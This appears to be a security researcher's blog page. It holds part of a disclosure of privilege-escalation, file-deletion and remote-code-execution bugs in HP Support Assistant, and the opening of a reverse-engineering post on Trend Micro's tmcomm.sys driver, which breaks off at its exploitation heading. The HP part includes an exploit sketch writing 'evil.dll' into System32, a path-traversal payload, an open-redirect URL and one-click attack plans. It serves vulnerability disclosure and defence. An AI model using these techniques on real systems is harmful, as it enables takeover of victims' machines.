[Screenshot: the update path verification method]

This verification method will first ensure that the update path is an absolute path that does not lead to a junction or reparse point. Good job on HP's part for checking this.

The next check is that the update path "starts with" a whitelisted base path. For my 64-bit machine, MainAppPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Framework and FrameworkPath expands to C:\Program Files (x86)\Hewlett Packard\HP Support Solutions.

What this check essentially means is that since our path has to be absolute AND it must start with a path to HP's Program Files directory, the update path must actually be inside their installation folder.

The final verification step is ensuring that the update path points to a binary signed by HP.

If all of these checks pass, the method creates a Task Scheduler task to be executed immediately by an Administrator. If any Administrator is logged on, the binary is immediately executed.

Exploitation: Local Privilege Escalation #5

A tricky one. Our update path must be something in HP’s folders, but what could that be? This stumped me for a while, but I got a spark of an idea while brainstorming.

We have the ability to start ANY program in HP’s installation folder with ANY arguments, interesting. What types of binaries does HP’s installation folders have? Are any of them interesting?

I found a few interesting binaries in the whitelisted directories such as Extract.exe and unzip.exe. On older versions, we could use unzip.exe, but a new update implements a signature check. Extract.exe didn’t even work when I tried to use it normally. I peeked at several binaries in dnSpy and I found an interesting one, HPSF_Utils.exe.

When the binary was started with the argument "encrypt" or "decrypt", the method below would be executed.

[Screenshot: the HPSF_Utils encrypt/decrypt method]

If we passed "encrypt" as the first argument, the method would take the second argument, read it in and encrypt it, then write it to the file specified at the third argument. If we passed "decrypt", it would do the same thing except read in an encrypted file and write the decrypted version to the third argument path.

If you haven't caught on to why this is useful: we can abuse the decrypt functionality to write our malicious file anywhere on the system, easily allowing us to escalate privileges. Since this binary is in the whitelisted path, we can execute it through CreateInstantTask and abuse it to gain Administrator, because we can write anything to anywhere.
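
As a sketch, the abuse boils down to a single call. Here "service" stands for a hypothetical validated proxy to the contract interface, the argument order of CreateInstantTask follows the description above, and all paths are illustrative:

string hpsfUtils = @"C:\Program Files (x86)\Hewlett Packard\HP Support Framework\HPSF_Utils.exe";

// The input is a file we previously ran through the "encrypt" mode ourselves;
// the output lands anywhere we choose, written with the task's privileges.
string arguments = "decrypt \"C:\\Users\\attacker\\payload.enc\" \"C:\\Windows\\System32\\evil.dll\"";

service.CreateInstantTask(hpsfUtils, "InnocentUpdate", arguments);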

Arbitrary File Deletion Vulnerabilities

Discovery: Arbitrary File Deletion

Let’s start with some arbitrary file deletion vulnerabilities. Although file deletion probably won’t lead to Local Privilege Escalation, I felt that it was serious enough to report because I could seriously mess up a victim’s machine by abusing HP’s software.

The protected method we'll be looking at is LogSoftPaqResults. This method is very short for our purposes; all we need to read are the first few lines.

[Screenshot: the first few lines of LogSoftPaqResults]

When the method is called, it will combine the temporary path C:\Windows\TEMP and the ExecutableName from the untrusted action item base using an unsafe string concatenation. If the file at this path exists AND it is not signed by HP, it will go ahead and delete it.

Exploitation: Arbitrary File Deletion #1

This is a pretty simple bug. Since HP uses unsafe string concatenation on path strings, we can just escape out of the C:\Windows\TEMP directory via relative path escapes (i.e ../) to reach any file we want.

If that file exists and isn’t signed by HP, the method which is running in the context of a SYSTEM process will delete that file. This is pretty serious because imagine if I ran this on the entirety of your system32 folder. That would definitely not be good for your computer.

Exploitation: Arbitrary File Deletion #2

This bug was even simpler than the last one, so I decided not to create a dedicated discovery section. Let’s jump into the past and look at the protected method UncompressCabFile.
When the method starts, as we reviewed before, the following is checked:

  1. cabFilePath (path to the cabinet file to extract) exists.
  2. cabFilePath is signed by HP.
  3. Our token is "trusted" and the cabFilePath contains a few pre-defined paths.

If these conditions are not met, the method will delete the file specified by cabFilePath.

If we want to delete a file, all we need to do is specify pretty much any path in the cabFilePath argument and let the method delete it while running as the SYSTEM user.

Remote Code Execution Vulnerability

Discovery

For most of this report we’ve reviewed vulnerabilities inside the HP service. In this section, we’ll explore a different HP binary. The methods reviewed in "General Exploitation" will not apply to this bug.

When I was looking for attack surfaces for Remote Code Execution, one of the first things I checked was for registered URL Protocols. Although I could find these manually in regedit, I opted to use the tool URLProtocolView. This neat tool will allow us to easily enumerate the existing registered URL Protocols and what command line they execute.

Scrolling down to "hp" after sorting by name showed quite a few options.

[Screenshot: URLProtocolView listing the registered hp URL protocols]

The first one looked mildly interesting because the product name of the binary was "HP Download and Install Assistant", could this assist me in achieving Remote Code Execution? Let’s pop it open in dnSpy.

The first thing the program does is throw the passed command line arguments into its custom argument parser. Here are the arguments we can pass into this program:

  1. remotefile = The URL of a remote file to download.
  2. filetitle = The name of the file downloaded.
  3. source = The "launch point" or the source of the launch.
  4. caller = The calling process name.
  5. cc = The country used for localization.
  6. lc = The language used for localization.

After parsing out the arguments, the program starts creating a "download request". The method will read the download history to see if the file was already downloaded. If it wasn’t downloaded before, the method adds the download request into the download requests XML file.

After creating the request, the program will "process" the XML data from the history file. For every pending download request, the method will create a downloader.

During this creation is when the first integrity checks are done. The constructor for the downloader first extracts the filename specified in the remotefile argument. It parses the name out by finding the last index of the character / in the remotefile argument and then taking the substring starting from that index to the end of the string. For example, if we passed in https://example.com/test.txt for the remote file, the method would parse out test.txt.

If the file name contains a period, verification on the extension begins. First, the method parses the file extension by getting everything after the last period in the name. If the extension is exe, msi, msp, msu, or p2 then the download is marked as an installer. Otherwise, the extension must be one of 70 other whitelisted extensions. If the extension is not one of those, the download is cancelled.
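
Reconstructed in C#, the parsing looks roughly like this (paraphrased from the decompilation, so treat the details as approximate):

using System;

string remoteFile = "https://example.com/test.txt";
string fileName = remoteFile.Substring(remoteFile.LastIndexOf('/') + 1); // "test.txt"
string extension = fileName.Substring(fileName.LastIndexOf('.') + 1);    // "txt"

string[] installerExtensions = { "exe", "msi", "msp", "msu", "p2" };
bool isInstaller = Array.IndexOf(installerExtensions, extension.ToLower()) >= 0;
// Non-installers must match one of the ~70 other whitelisted extensions or
// the download is cancelled; only installers are signature-checked later.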

After verifying the file extension, the complete file path is created.

[Screenshot: the CreateLocalFilename method]

First, if the lc argument is ar (Arabic), he (Hebrew), ru (Russian), zh (Chinese), ko (Korean), th (Thai), or ja (Japanese), your file name is just the name extracted from the URL. Otherwise, your file name is the filetitle argument and the file name from the URL combined. Finally, the method will replace any invalid characters present in Path.GetInvalidFileNameChars with a space.

This sanitized file name is then combined with the current user's download folder + HP Downloads.

The next relevant step is for the download to begin, this is where the second integrity check is. First, the remote file URL argument must begin with https. Next, a URI object is created for the remote file URL. The host of this URI must end with .hp.com or end with .hpicorp.net. Only if these checks are passed is the download started.

Once the download has finished, another check is done. Before the download is marked as downloaded, the program verifies the downloaded content. This is done by first checking if the download is an installer, which was set during the file name parsing stage. If the download is an installer then the method will verify the certificate of the downloaded file. If the file is not an installer, no check is done.

[Screenshot: the downloaded content verification]

The first step of verifying the certificate of the file is to check that it matches the binary. The method does this by calling WinVerifyTrust on the binary. The method does not care if the certificate is revoked. The next check is extracting the subject of the certificate. This subject field must contain in any case hewlett-packard, hewlett packard, or o=hp inc.
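
Modeled in C#, the subject portion of the check looks roughly like this (a sketch; the WinVerifyTrust call happens separately as described above):

using System.Security.Cryptography.X509Certificates;

class HpSubjectCheck
{
    // Sketch of the subject check as described ("path" is the downloaded file).
    // The containment test after lowercasing is the weak point exploited in
    // variant #3 below.
    public static bool HasHpSubject(string path)
    {
        var certificate = new X509Certificate2(
            X509Certificate.CreateFromSignedFile(path));
        string subject = certificate.Subject.ToLower();
        return subject.Contains("hewlett-packard")
            || subject.Contains("hewlett packard")
            || subject.Contains("o=hp inc");
    }
}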

When the client presses the open or install button on the form, this same check is done again, and then the file is started using C#’s Process.Start. There are no arguments passed.

Exploitation

There are several ways to approach exploiting this program. In the next sections, I'll be showing different variants of attack and the pros/cons of each one. Let's start by bypassing a check we need to get past for any variant: the URL check.

As we just reviewed, the remote URL passed must have a host that ends with .hp.com or .hpicorp.net. This is tricky because the verification method uses the safe and secure way of verifying the URL’s host by first using C#’s URI parser. Our host will really need to contain .hp.com or .hpicorp.net.

A previous vulnerability in this report had the same issue. If you haven't read that section, I would highly recommend it to understand where we got this magical open redirect vulnerability in one of HP's websites: https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com.

Back to the verification method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where we can host any file we want.

This sums up the "general" exploitation portion of the Remote Code Execution bugs. Let’s get into the individual ones.

Remote Code Execution Variant #1

The first way I would approach this is seeing what type of file we can have our victim download without the HP program thinking it's an installer. Only if it's an installer will the program verify its signature.

Looking at the whitelisted file extensions, we don't have that much to work with, but we have some options. One whitelisted option is zip; this could work. An ideal attack scenario would be a website telling the victim they need a critical update, the downloader suddenly popping up with the HP logo, and the victim pressing open on the zip file and executing a binary inside it.

To have a valid remote file URL, we will need to abuse the open redirect bug. I put my bad file on my web server and just put the URL to the zip file at the end of the open redirect URL.

When the victim visits my malicious website, an iframe with the hpdia:// URL Protocol is loaded and the download begins.

This attack is somewhat lame because it requires two clicks to RCE, but I still think it’s more than a valid attack method since the HP downloader looks pretty legit.

Remote Code Execution Variant #2

My next approach is definitely more interesting than the last. In this method, we first make the program download a DLL file which is NOT an installer, then we install a signed HP binary which depends on this DLL.

Similar to our DLL Hijacking attack in the third Local Privilege Escalation vulnerability, we can use any signed binary which imports a DLL that doesn’t exist. By simply naming our malicious DLL to the missing DLL name, the executed signed program will end up loading our malicious DLL giving us Remote Code Execution.

Here's the catch. We're going to have to set the language of the downloader to Arabic, Hebrew, Russian, Chinese, Korean, Thai, or Japanese. The reason is that for DLL Hijacking, we need our malicious DLL's name to exactly match that of the missing DLL.

[Screenshot: the CreateLocalFilename method]

If you recall the CreateLocalFilename method, the actual filename will have the filetitle in it if the language we pass in through arguments is not one of those languages. If we do pass in a language that's one of the ones checked for in the function above, the filename will be the filename specified in the remote URL.

If your target victim is in a country where one of these languages is spoken commonly, this is in my opinion the best attack route. Otherwise, it may be a bit of an optimistic approach.

Whenever the victim presses any of the open or install all buttons, the signed binary will start and load our malicious DLL. If your victim is in an English-speaking country or only speaks English, this may be a little more difficult.

You could have the website present a critical update guide telling the visitor what button to press to update their system, but I am not sure if a user is more likely to press a button in a foreign language or open a file in a zip they opened.

At the end of the day, this is a one-click attack method, and it would work phenomenally in a country that uses the mentioned languages. This variant can also be used after detecting the victim's language and seeing if it's one of the few languages we can use with this variant. You can see the victim's language in HTTP headers or just navigator.language in JavaScript.

Remote Code Execution Variant #3

The last variant for achieving remote code execution is a bit optimistic in how many resources the attacker has, but I don't think it's a significant barrier for an APT.

To review, if the extension of the file we’re downloading is considered an installer (see installer extensions in discovery), our binary will be checked for HP’s signature. Let’s take a look at the signature check.

[Screenshot: the certificate verification method]

The method takes in a file name and first verifies that the file has a valid certificate. This means a certificate ripped from a legitimate HP binary won't work, because it won't match the binary. The concerning part is the check for whether the certificate is an HP certificate.

To be considered an HP certificate, the subject of the certificate must contain in any case hewlett-packard, hewlett packard, or o=hp inc. This is a pretty inadequate check, especially that lower case conversion. Here are a few example companies I can form that would pass this check:

  1. [something]hewlett PackArd[something]
  2. HP Inc[something]

I could probably spend days making up company names. All an attacker needs to do is create an organization that contains any of those words and they can get a certificate for that company. Next thing you know, they can have a one click RCE for anyone that has the HP bloatware installed.

Proof of Concept

Local Privilege Escalation Vulnerabilities

Remote Code Execution Vulnerabilities

"Remediation"

HP had their initial patch finished three months after I sent them the report of my findings. When I first heard they were aiming to patch 10 vulnerabilities in such a reasonable time-frame, I was impressed, because it appeared like they were being a responsible organization that took security vulnerabilities seriously. This was in contrast to the performance I saw last year with my research into Remote Code Execution in Dell's bloatware, where they took 6 months to deliver a patch for a single vulnerability, an absurd amount of time.

In the following section, I'll be going over the vulnerabilities HP did not patch or patched inadequately. Here is an overview of what was actually patched:

  1. Local Privilege Escalation #1 – Patched ✔️
  2. Local Privilege Escalation #2 – Unpatched ❌
  3. Local Privilege Escalation #3 – Unpatched ❌
  4. Local Privilege Escalation #4 – "Patched" 😕 (not really)
  5. Local Privilege Escalation #5 – Unpatched ❌
  6. Arbitrary File Deletion #1 – Patched ✔️
  7. Arbitrary File Deletion #2 – Patched ✔️
  8. Remote Code Execution Variant #1 – Patched ✔️
  9. Remote Code Execution Variant #2 – Patched ✔️
  10. Remote Code Execution Variant #3 – Patched ✔️

Re-Discovery

New Patch, New Vulnerability

The largest change observed is the transition from the hardcoded "C:\Windows\TEMP" temporary directory to relying on the action item base supplied by the client to specify the temporary directory.

I am not sure if HP PSIRT did not review the patch or if HP has a lack of code review in general, but this transition actually introduced a new vulnerability. Now, instead of having a trusted hardcoded string be the deciding factor for the temporary directory… HP relies on untrusted client data (the action item base).

As an attacker, my unprivileged process is what decides the value of the temporary directory used by the elevated agent, not the privileged service process, allowing for simple spoofing. This was one of the more shocking components of the patch. HP had not only left some vulnerabilities unpatched but in doing so ended up making some code worse than it was. This change mostly impacted the Local Privilege Escalation vulnerabilities.

Local Privilege Escalation #2

Looking over the new InstallSoftpaqsSilently method, the primary changes are:

  1. The untrusted ActionItemBase specifies the temporary directory.
  2. There is more insecure path concatenation (path1 + path2 versus C#’s Path.Combine).
  3. There is more verification on the path specified by the temporary directory and executable name (i.e checking for relative path escapes, NTFS reparse points, rooted path, etc).

The core problems that are persistent even after patching:

  1. The path that is executed by the method still utilizes unvalidated untrusted client input. Specifically, the method splits the item property SilentInstallString by double quote and utilizes values from that array for the name of the binary. This binary name is not validated besides a simple check to see if the file exists. No guarantees it isn’t an attacker’s binary.
  2. There is continued use of insecure coding practices involving paths. For example, HP consistently concatenates paths by using the string combination operator versus using a secure concatenation method such as Path.Combine.

In order to have a successful call to InstallSoftpaqsSilently, you must now meet these requirements:

  1. The file specified by the TempDirectory property + ExecutableName property must exist.
  2. The file specified by TempDirectory property + ExecutableName property must be signed by HP.
  3. The path specified by TempDirectory property + ExecutableName property must pass the VerifyHPPath requirements:
    a. The path cannot contain relative path escapes.
    b. The path must be a rooted path.
    c. The path must not be a junction point.
    d. The path must start with HP path.
  4. The SilentInstallString property must contain the SPName property + .exe.
  5. The directory name is the TempDirectory property + swsetup\ + the ExecutableName property with .exe stripped.
  6. The Executable Name is specified in the SilentInstallString property split by double quote. If the split has a size greater than 1, it will take the second element as EXE Name, else the first element.
  7. The Executable Name must not contain .exe or .msi, otherwise, the Directory Name + \ + the Executable Name must exist.
  8. The function executes the binary specified at Directory Name + \ + Executable Name.

The core point of attack is outlined in steps 6 and 7. We can control the Executable Name by formulating a malicious payload for the SilentInstallString item property that escapes from a legitimate directory passed in the TempDirectory property into an attacker-controlled directory.

For example, if we pass:

  1. C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\ for the TempDirectory property.
  2. HPSF.exe for the ExecutableName property.
  3. malware for the SPName property.
  4. "..\..\..\..\..\Malware\malware.exe (quote at beginning intentional) for the SilentInstallString property.

The service will execute the binary at C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\swsetup\HPSF\..\..\..\..\..\Malware\malware.exe which ends up resolving to C:\Malware\malware.exe thus executing the attacker controlled binary as SYSTEM.

Local Privilege Escalation #3

The primary changes for the new InstallSoftpaqsDirectly method are:

  1. The untrusted ActionItemBase specifies the temporary directory.
  2. Invalid binaries are no longer deleted.

The only thing we need to change in our proof of concept is to provide our own TempDirectory path. That’s… it.

Local Privilege Escalation #4

For the new DownloadSoftpaq method, the primary changes are:

  1. The download URL cannot have query parameters.

The core problems that are persistent even after patching:

  1. Insecure validation of the download URL.
  2. Insecure validation of the downloaded binary.
  3. Open Redirect bug on ers.rssx.hp.com.

First of all, HP still only does a basic check on the hostname to ensure it ends with a whitelisted host; however, this does not address the core issue that the check itself is insecure.

Simply checking the hostname leaves the door open to Man-in-the-Middle attacks, other Open Redirect vulnerabilities, and virtual host based attacks (e.g. a subdomain that resolves to 127.0.0.1).

For an unknown reason, HP still does not delete the binary downloaded if it does not have an HP signature because HP passes the constant false for the parameter that indicates whether or not to delete a bad binary.

At the end of the day, this is still a patched vulnerability since at this time you can’t quite exploit it, but I wouldn’t be surprised to see this exploited in the future.

Local Privilege Escalation #5

This vulnerability was left completely untouched. Not much more to say about it.

Timeline

Here is a timeline of HP's response:

10/05/2019 - Initial report of vulnerabilities sent to HP.
10/08/2019 - HP PSIRT acknowledges receipt and creates a case.
12/19/2019 - HP PSIRT pushes an update and claims to have "resolved the issues reported".
01/01/2020 - Updated report of unpatched vulnerabilities sent to HP.
01/06/2020 - HP PSIRT acknowledges receipt.
02/05/2020 - HP PSIRT schedules a new patch for the first week of March.
03/09/2020 - HP PSIRT pushes the scheduled patch to 03/21/2020 due to Novel Coronavirus complications.

Protecting your machine

If you're wondering what you need to do to ensure your HP machine is safe from these vulnerabilities, it is critical to ensure that the software is up to date or removed. HP Support Assistant does not update automatically unless you explicitly opt in (HP claims otherwise).

It is important to note that because HP has not patched three local privilege escalation vulnerabilities, even if you have the latest version of the software, you are still vulnerable unless you completely remove the agent from your machine (Option 1).

Option 1: Uninstall

The best mitigation to protect against the attacks described in this article and future vulnerabilities is to remove the software entirely. This may not be an option for everyone, especially if you rely on the updating functionality the software provides, however, removing the software ensures that you're safe from any other vulnerabilities that may exist in the application.

For most Windows installations, you can use the "Add or remove programs" component of the Windows control panel to uninstall the service. There are two pieces of software to uninstall, one is called "HP Support Assistant" and the other is called "HP Support Solutions Framework".

Option 2: Update

The next best option is to update the agent to the latest version. The latest update fixes several of the vulnerabilities discussed, except for three local privilege escalation vulnerabilities.

There are two ways to update the application. The recommended method is opening "HP Support Assistant" from the Start menu, clicking "About" in the top right, and pressing "Check for latest version". Another method of updating is to install the latest version from HP's website here.

How to use Trend Micro's Rootkit Remover to Install a Rootkit

18 May 2020 at 15:32

The opinions expressed in this publication are those of the authors. They do not reflect the opinions or views of my employer. All research was conducted independently.

For a recent project, I had to research the methods by which rootkits are detected and the most effective measures to catch them, which raised the question: what are some existing solutions to rootkits and how do they function? My search eventually landed me on the TrendMicro RootkitBuster, which describes itself as "A free tool that scans hidden files, registry entries, processes, drivers, and the master boot record (MBR) to identify and remove rootkits".

The features it boasted certainly caught my attention. They were claiming to detect several techniques rootkits use to burrow themselves into a machine, but how does it work under the hood and can we abuse it? I decided to find out by reverse engineering core components of the application itself, leading me down a rabbit hole of code that scarred me permanently, to say the least.

Discovery

Starting the adventure, launching the application resulted in a fancy warning by Process Hacker that a new driver had been installed.


Already off to a good start, we got a copy of Trend Micro's "common driver"; this was definitely something to look into. Besides this driver being installed, a friendly window opened prompting me to accept Trend Micro's user agreement.


I wasn't in the mood to sign away my soul to the devil just yet, especially since the terms included a clause stating "You agree not to attempt to reverse engineer, decompile, modify, translate, disassemble, discover the source code of, or create derivative works from...".

Thankfully, Trend Micro already deployed their software onto my machine before I accepted any terms. Funnily enough, when I tried to exit the process by right-clicking on the application and pressing "Close Window", it completely bypassed the license agreement and went to the main screen of the scanner, even though I had selected the "I do not accept the terms of the license agreement" option. Thanks Trend Micro!


I noticed a quick command prompt flash when I started the application. It turns out this was the result of a 7-Zip Self Extracting binary which extracted the rest of the application components to %TEMP%\RootkitBuster.


Let's review the driver we'll be covering in this article.

  • The tmcomm driver, labeled as the "TrendMicro Common Module" and "Trend Micro Eyes". A quick look over the driver indicated that it accepts communication from privileged user-mode applications and performs common actions that are not specific to the Rootkit Remover itself. This driver is not only used in the Rootkit Buster but is implemented throughout Trend Micro's product line.

In the following sections, we'll be deep diving into the tmcomm driver. We'll focus our research on finding different ways to abuse the driver's functionality, with the end goal of executing kernel code. I decided not to look into tmrkb.sys because, although I am sure it is vulnerable, it seems to only be used for the Rootkit Buster.

TrendMicro Common Module (tmcomm.sys)

Let's begin our adventure with the base driver that appears to be used not only for this Rootkit Remover utility, but several other Trend Micro products as well. As I stated in the previous section, a very brief look-over of the driver revealed that it does allow for communication from privileged user-mode applications.


One of the first actions the driver takes is to create a device to accept IOCTL communication from user-mode. The driver creates a device at the path \Device\TmComm and a symbolic link to the device at \DosDevices\TmComm (accessible via \\.\Global\TmComm). The driver entrypoint initializes a significant amount of classes and structure used throughout the driver, however, for our purposes, it is not necessary to cover each one.

I was happy to see that Trend Micro made the correct decision of restricting their device to the SYSTEM user and Administrators. This meant that even if we did find exploitable code, because any communication would require at least Administrative privileges, a significant amount of the industry would not consider it a vulnerability. For example, Microsoft themselves do not consider Administrator to Kernel to be a security boundary because of the significant amount of access Administrators get. This does not mean, however, that exploitable code in Trend Micro's drivers won't be useful.


TrueApi

A large component of the driver is its "TrueApi" class which is instantiated during the driver's entrypoint. The class contains pointers to imported functions that get used throughout the driver. Here is a reversed structure:

struct TrueApi
{
	BYTE Initialized;
	PVOID ZwQuerySystemInformation;
	PVOID ZwCreateFile;
	PVOID unk1; // Initialized as NULL.
	PVOID ZwQueryDirectoryFile;
	PVOID ZwClose;
	PVOID ZwOpenDirectoryObjectWrapper;
	PVOID ZwQueryDirectoryObject;
	PVOID ZwDuplicateObject;
	PVOID unk2; // Initialized as NULL.
	PVOID ZwOpenKey;
	PVOID ZwEnumerateKey;
	PVOID ZwEnumerateValueKey;
	PVOID ZwCreateKey;
	PVOID ZwQueryValueKey;
	PVOID ZwQueryKey;
	PVOID ZwDeleteKey;
	PVOID ZwTerminateProcess;
	PVOID ZwOpenProcess;
	PVOID ZwSetValueKey;
	PVOID ZwDeleteValueKey;
	PVOID ZwCreateSection;
	PVOID ZwQueryInformationFile;
	PVOID ZwSetInformationFile;
	PVOID ZwMapViewOfSection;
	PVOID ZwUnmapViewOfSection;
	PVOID ZwReadFile;
	PVOID ZwWriteFile;
	PVOID ZwQuerySecurityObject;
	PVOID unk3; // Initialized as NULL.
	PVOID unk4; // Initialized as NULL.
	PVOID ZwSetSecurityObject;
};

Looking at the code, the TrueApi is primarily used as an alternative to calling the functions directly. My educated guess is that Trend Micro caches these imported functions at initialization to evade delayed IAT hooks. However, since the TrueApi is resolved by looking at the import table, this mechanism is useless against a rootkit that hooks the IAT on driver load.

XrayApi

Similar to the TrueApi, the XrayApi is another major class in the driver. This class is used to access several low-level devices and to interact directly with the filesystem. A major component of the XrayApi is its "config". Here is a partially reverse-engineered structure representing the config data:

struct XrayConfigData
{
	WORD Size;
	CHAR pad1[2];
	DWORD SystemBuildNumber;
	DWORD UnkOffset1;
	DWORD UnkOffset2;
	DWORD UnkOffset3;
	CHAR pad2[4];
	PVOID NotificationEntryIdentifier;
	PVOID NtoskrnlBase;
	PVOID IopRootDeviceNode;
	PVOID PpDevNodeLockTree;
	PVOID ExInitializeNPagedLookasideListInternal;
	PVOID ExDeleteNPagedLookasideList;
	CHAR unkpad3[16];
	PVOID KeAcquireInStackQueuedSpinLockAtDpcLevel;
	PVOID KeReleaseInStackQueuedSpinLockFromDpcLevel;
	...
};

The config data stores the locations of internal/undocumented variables in the Windows Kernel such as IopRootDeviceNode, PpDevNodeLockTree, ExInitializeNPagedLookasideListInternal, and ExDeleteNPagedLookasideList. My educated guess is that the purpose of this class is to access low-level devices directly rather than use documented methods which could be hijacked.

IOCTL Requests

Before we get into what the driver allows us to do, we need to understand how IOCTL requests are handled.

In the primary dispatch function, the Trend Micro driver converts the data accompanying an IRP_MJ_DEVICE_CONTROL request into a proprietary structure I call a TmIoctlRequest.

struct TmIoctlRequest
{
	DWORD InputSize;
	DWORD OutputSize;
	PVOID UserInputBuffer;
	PVOID UserOutputBuffer;
	PVOID Unused;
	DWORD_PTR* BytesWritten;
};

The way Trend Micro organized dispatching of IOCTL requests is by having several "dispatch tables". The "base dispatch table" simply contains an IOCTL Code and a corresponding "sub dispatch function". For example, when you send an IOCTL request with the code 0xDEADBEEF, it will compare each entry of this base dispatch table and pass along the data if there is a table entry that has the matching code. A base table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *DispatchFunction_t)(TmIoctlRequest *IoctlRequest);

struct BaseDispatchTableEntry
{
	DWORD_PTR IOCode;
	DispatchFunction_t DispatchFunction;
};

After the DispatchFunction is called, it typically verifies some of the data provided, ranging from basic nullptr checks to checking the size of the input and output buffers. These "sub dispatch functions" then do another lookup based on a code passed in the user input buffer to find the corresponding "sub table entry". A sub table entry can be represented by the structure below:

typedef NTSTATUS (__fastcall *OperationFunction_t)(PVOID InputBuffer, PVOID OutputBuffer);

struct SubDispatchTableEntry
{
	DWORD64 OperationCode;
	OperationFunction_t PrimaryRoutine;
	OperationFunction_t ValidatorRoutine;
};

Before calling the PrimaryRoutine, which actually performs the requested action, the sub dispatch function calls the ValidatorRoutine. This routine does "action-specific" validation on the input buffer, meaning that it performs checks on the data the PrimaryRoutine will be using. Only if the ValidatorRoutine returns successfully will the PrimaryRoutine be called.

Now that we have a basic understanding of how IOCTL requests are handled, let's explore what they allow us to do. Referring back to the definition of the "base dispatch table", which stores "sub dispatch functions", let's explore each base table entry and figure out what each sub dispatch table allows us to do!

IoControlCode == 9000402Bh

Discovery

This first dispatch table appears to interact with the filesystem, but what does that actually mean? To start things off, the code for the "sub dispatch table" entry is obtained by dereferencing a DWORD from the start of the input buffer. This means that to specify which sub dispatch entry you'd like to execute, you simply need to set a DWORD at the base of the input buffer to that entry's OperationCode.
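
As a concrete sketch, a privileged user-mode client reaches a sub dispatch entry roughly like this (assumptions: the \\.\Global\TmComm device path from earlier and the DWORD-at-offset-zero convention; the rest of the input buffer layout is operation-specific and omitted):

#include <windows.h>
#include <cstdio>

int main() {
    // Requires at least Administrator thanks to the device's security descriptor.
    HANDLE device = CreateFileW(L"\\\\.\\Global\\TmComm",
                                GENERIC_READ | GENERIC_WRITE, 0, nullptr,
                                OPEN_EXISTING, 0, nullptr);
    if (device == INVALID_HANDLE_VALUE)
        return 1;

    BYTE input[0x100] = {};
    *reinterpret_cast<DWORD*>(input) = 0x2713; // an OperationCode from the table below
    BYTE output[0x100] = {};
    DWORD bytesReturned = 0;

    // 0x9000402B selects the filesystem "sub dispatch table".
    BOOL ok = DeviceIoControl(device, 0x9000402B, input, sizeof(input),
                              output, sizeof(output), &bytesReturned, nullptr);
    printf("DeviceIoControl returned %d\n", ok);
    CloseHandle(device);
    return 0;
}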

To make our lives easier, Trend Micro conveniently included a significant amount of debugging strings, often giving an idea of what a function does. Here is a table of the functions I reversed in this sub dispatch table and what they allow us to do.

OperationCode | PrimaryRoutine                | Description
2713h         | IoControlCreateFile           | Calls NtCreateFile; all parameters are controlled by the request.
2711h         | IoControlFindNextFile         | Returns STATUS_NOT_SUPPORTED.
2710h         | IoControlFindFirstFile        | Performs nothing; always returns STATUS_SUCCESS.
2712h         | IoControlFindCloseFile        | Calls ZwClose; all parameters are controlled by the request.
2715h         | IoControlReadFileIRPNoCache   | References a FileObject using a HANDLE from the request, calls IofCallDriver, and reads the result.
2714h         | IoControlCreateFileIRP        | Creates a new FileObject and associates the DeviceObject for the requested drive.
2716h         | IoControlDeleteFileIRP        | Deletes a file by sending an IRP_MJ_SET_INFORMATION request.
2717h         | IoControlGetFileSizeIRP       | Queries a file's size by sending an IRP_MJ_QUERY_INFORMATION request.
2718h         | IoControlSetFilePosIRP        | Sets a file's position by sending an IRP_MJ_SET_INFORMATION request.
2719h         | IoControlFindFirstFileIRP     | Returns STATUS_NOT_SUPPORTED.
271Ah         | IoControlFindNextFileIRP      | Returns STATUS_NOT_SUPPORTED.
2720h         | IoControlQueryFile            | Calls NtQueryInformationFile; all parameters are controlled by the request.
2721h         | IoControlSetInformationFile   | Calls NtSetInformationFile; all parameters are controlled by the request.
2722h         | IoControlCreateFileOplock     | Creates an Oplock via IoCreateFileEx and other filesystem API.
2723h         | IoControlGetFileSecurity      | Calls NtCreateFile and then ZwQuerySecurityObject; all parameters are controlled by the request.
2724h         | IoControlSetFileSecurity      | Calls NtCreateFile and then ZwSetSecurityObject; all parameters are controlled by the request.
2725h         | IoControlQueryExclusiveHandle | Checks if a file is opened exclusively.
2726h         | IoControlCloseExclusiveHandle | Forcefully closes a file handle.

IoControlCode == 90004027h

Discovery

This dispatch table is primarily used to control the driver's process scanning features. Many functions in this sub dispatch table use a separate scanning thread to synchronously search for processes via various methods both documented and undocumented.

OperationCode | PrimaryRoutine            | Description
C350h         | GetProcessesAllMethods    | Find processes via ZwQuerySystemInformation and WorkingSetExpansionLinks.
C351h         | DeleteTaskResults*        | Delete results obtained through other functions like GetProcessesAllMethods.
C358h         | GetTaskBasicResults*      | Further parse results obtained through other functions like GetProcessesAllMethods.
C35Dh         | GetTaskFullResults*       | Completely parse results obtained through other functions like GetProcessesAllMethods.
C360h         | IsSupportedSystem         | Returns TRUE if the system is "supported" (whether or not they have hardcoded offsets for your build).
C361h         | TryToStopTmComm           | Attempt to stop the driver.
C362h         | GetProcessesViaMethod     | Find processes via a specified method.
C371h         | CheckDeviceStackIntegrity | Check for tampering on devices associated with physical drives.
C375h         | ShouldRequireOplock       | Returns TRUE if oplocks should be used for certain scans.

These IOCTLs revolve around a few structures I call "MicroTask" and "MicroScan". Here are the structures reverse-engineered:

struct MicroTaskVtable
{
	PVOID Constructor;
	PVOID NewNode;
	PVOID DeleteNode;
	PVOID Insert;
	PVOID InsertAfter;
	PVOID InsertBefore;
	PVOID First;
	PVOID Next;
	PVOID Remove;
	PVOID RemoveHead;
	PVOID RemoveTail;
	PVOID unk2;
	PVOID IsEmpty;
};

struct MicroTask
{
	MicroTaskVtable* vtable;
	PVOID self1; // ptr to itself.
	PVOID self2; // ptr to itself.
	DWORD_PTR unk1;
	PVOID MemoryAllocator;
	PVOID CurrentListItem;
	PVOID PreviousListItem;
	DWORD ListSize;
	DWORD unk4; // Initialized as NULL.
	char ListName[50];
};

struct MicroScanVtable
{
	PVOID Constructor;
	PVOID GetTask;
};

struct MicroScan
{
	MicroScanVtable* vtable;
	DWORD Tag; // Always 'PANS'.
	char pad1[4];
	DWORD64 TasksSize;
	MicroTask Tasks[4];
};

For most of the IOCTLs in this sub dispatch table, a MicroScan is passed in by the client, which the driver populates. We'll look into how we can abuse this trust in the next section.

Exploitation

